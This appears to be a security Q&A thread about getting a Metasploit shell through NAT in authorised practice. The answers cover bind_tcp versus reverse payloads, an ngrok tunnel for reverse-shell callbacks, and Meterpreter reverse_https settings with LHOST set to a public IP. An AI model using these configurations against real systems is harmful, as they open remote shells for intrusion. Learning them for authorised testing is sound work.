# Metasploit Get Shell Through NAT

Tags: penetration-test, metasploit

Ok first of all this is legal and I have it in writing my friend and I are attacking eachother to get better and not break the law.

**Setup**
I have a VMWare image running BT5R3. It uses VMWare's NAT then my network is behind a router using NAT. From there I am VPN tunneled into work which also uses NAT (I believe). I've come to realize that I have only ever run metasploit from the inside or in a lab but never over the internet.

**Question**
I'm pretty sure with this scenario a reverse payload wouldn't be possible since it requires the machine to connect back to me. Will this work with any payload at all?

Answer (score 3, accepted):

This won't work with reverse payloads unless you can do portforwarding on the system which is NATing your traffic. Hence it's better to generate a payload which allows you to connect to it rather than a payload which connects back (but if your target is also using NAT, then this becomes obsolete as well). For instance:

```
shell/bind_tcp
```

This does give problems if there is a firewall between you and the target. Best thing to do is take away the NAT completely if possible. In your case this seems quite difficult...

Comment: Bind shells don't help much if there is also NAT on the target side.

Comment: Yea, you are a bit out of options then.

Comment: Our victim servers are honeypots connected directly to the internet so there's no NAT there just from my side. So in this scenario you're saying bind_tcp will work but reverse will not unless I can do port forwarding which is exactly what I was thinking. Thanks Lucas!

Comment: I usually give it about a day before I mark as answer to allow others to chime in.

Answer (score 2):

You can user ngrok to create tunnel through NAT
https://ngrok.com/download

```
1. unzip /path/to/ngrok.zip
2../ngrok authtoken <YOUR_AUTH_TOKEN>
 You get authtoken when you create account on ngrok
3../ngrok http 80
```

this will create tunnel from your machine to access machine outside nat.
someting like this

```
    Web Interface                 http://127.0.0.1:4040                             
    Forwarding                    http://f44affd3.ngrok.io -> http://localhost:80   
    Forwarding                    https://f44affd3.ngrok.io -> http://localhost:80
```

Now you can use this https://f44affd3.ngrok.io address for reverse shell.
you can use tcp insted of http or you can even specify port also insted of 80 you can use other ports also

Answer (score 0):

You can use `meterpreter/reverse_https` and set `LHOST` to your public ip. Make sure you forward port `443` to the machine hosting metasploit.

```
set payload windows/meterpreter/reverse_https
set LPORT 443
set LHOST YOUR PUBLIC IP
```

> "Since our attacker host is behind NAT, we have to use the public IP
>   address of the router/firewall as LHOST.  When the exploit is
>   executed, this IP will be embedded in the shellcode and when the
>   initial Meterpreter shellcode runs on the target, it will connect back
>   to this IP address.  The port forwarding on our router/firewall will
>   then forward traffic to our LAN IP of the attacker host.  For this
>   reason, we need to set LHOST to 1.1.1.1 (the public IP of your
>   attacker router/firewall)
>
> Using a public IP as LHOST also means that Metasploit will attempt to
>   bind itself to that IP when setting up the Meterpreter handler.  Since
>   this IP belongs to the router/firewall and not to the Metasploit
>   instance, this will obviously fail.  The good thing is that Metasploit
>   will automatically fall back to 0.0.0.0 and basically serve the
>   Meterpreter handler on all local IPs on the attacker host, while
>   remembering that LHOST was set to our public IP address.  This is
>   exactly what we need."

Source: https://www.corelan.be/index.php/2014/01/04/metasploit-meterpreter-and-nat/

Comment: There is no public IP in this scenario.